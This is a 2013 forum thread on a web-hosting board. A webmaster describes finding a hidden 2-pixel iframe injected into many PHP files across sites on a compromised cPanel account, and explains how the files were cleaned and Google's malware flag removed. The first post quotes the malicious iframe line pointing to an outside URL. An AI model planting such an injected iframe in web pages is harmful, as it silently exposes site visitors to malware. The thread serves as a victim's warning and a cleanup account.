1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Warning People for Cpanel Users MALWARE

Discussion in 'Web Hosting' started by katika, Feb 16, 2013.

  1. katika

    katika Junior Member

    Joined:
    Feb 15, 2008
    Messages:
    107
    Likes Received:
    111
    I am really pissed now, Google send me notice that my main site is flagged cause there is Malware.

    I am in the middle of promotion, agghhhh.

    So motherfuckers injected iframe in my head section, randomly, in plugins, theme...

    Here is code:

    Code:
    <iframe src="http://www.phrae.tv/images/update.php" width="2" height="2" frameborder="0"></iframe>
    Few weeks ago I received Email from one of the BH forum, do not remember which one, to buy some crazy tool for code injection, deal was about 100 USD

    Now every fool and his brother can hack Cpanel for small price, without to know codes.

    I have customer sites on that Cpanel. And every one is infected with this iframe.

    And Cpanel does not have multiple find replace tool.

    So i must download every backup and do cleaning and upload files. And to be on Big. G mercy to remove flag from search results....

    Don't kno what to say. Any suggestions. Tips. Words to calm me down :(


    katika
     
  2. njohnson3163

    njohnson3163 Newbie

    Joined:
    Jun 25, 2012
    Messages:
    14
    Likes Received:
    3
    thanks for warning me about that! i'm actually going to look into how to secure myself from that now
     
  3. NProductions

    NProductions Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 26, 2012
    Messages:
    1,114
    Likes Received:
    658
    Gender:
    Male
    Occupation:
    Entrepreneur IQ [ 100/100 ]
    Location:
    Heaven .. Watching You
    Home Page:
    Thanks for the sharing & making Aware. Keep up the good work !
     
  4. katika

    katika Junior Member

    Joined:
    Feb 15, 2008
    Messages:
    107
    Likes Received:
    111
    Here is update

    Big G removed warning after 6-12 hours after I submitted review button in webmaster tool.

    Once again: I got email from Big G. cause I had inactive Adwords ad. So if I did not had the site in Adw. this site and other on same cPanel still be infected with this 2px iframe.

    0ther Cpanels from my WHM were not infected.

    All my 12 domains on that Cpanel acc. were infected, php files (wordpress or other) which had something with head section of site, mostly header.php in theme folder, some plugins files... other main WP folder and some root files too, about 50-60 files per site.

    I have lot of plugins and every site is 40-70 megs.

    Here are the steps for cleaning malware...:

    1. I compressed files in zip in Cpanel
    2. Download them, one by one
    3. Unpack them
    4. Multiple find replace to remove iframe code.
    5. Zip them and Upload to server.
    6. Open every domain in browser to look if I did good job
    7. Submitted form to Big G to ask for review


    This step 5 was time consumer, infected files are in all folders, and I do not have unlimited upload speed, so I split files to get zip 5-20 mega per site.

    Took me about 3 hours to do that.

    Google removed Red Window Warning in 15 minutes.

    I was tired (3dth hour after midnight), this saga was long about 6-7 hours: from email from Big G and my stress... browsing to find about problem, coffee breaks, tactic...

    When I wake up Warning blue line in search engine result was gone :)

    I hope this kind of problems you will never have, but here is my story and steps to solve problem.

    The worse thing: my VPS support failed me, they never answer to my tickets.

    Maybe they can speed up the task to do multiple find replace in server, but I do not know if Linux have this option as Win.

    regards
    katika
     
    Last edited: Feb 17, 2013
  5. iulianh

    iulianh Regular Member

    Joined:
    Feb 3, 2008
    Messages:
    349
    Likes Received:
    501
    I think unmanaged linux VPS without CPanel is safer now :) Thanks for the heads up
     
  6. SmartMan

    SmartMan BANNED BANNED

    Joined:
    Jul 25, 2012
    Messages:
    673
    Likes Received:
    1,244
    Did you use any nulled themes/plugins on any of your sites? Also which hosting do you use?
     
  7. Tsongkie

    Tsongkie Regular Member

    Joined:
    Dec 22, 2006
    Messages:
    207
    Likes Received:
    148
    Location:
    Pearl of the Orient Seas
    Home Page:
    Happened to me before when I used a "cracked" ftp client.
     
  8. katika

    katika Junior Member

    Joined:
    Feb 15, 2008
    Messages:
    107
    Likes Received:
    111
    All my sites have the same Artisteer legal themes, on 5 cpanels only this one was abused, yes there is some plugins.

    Cute FTP maybe?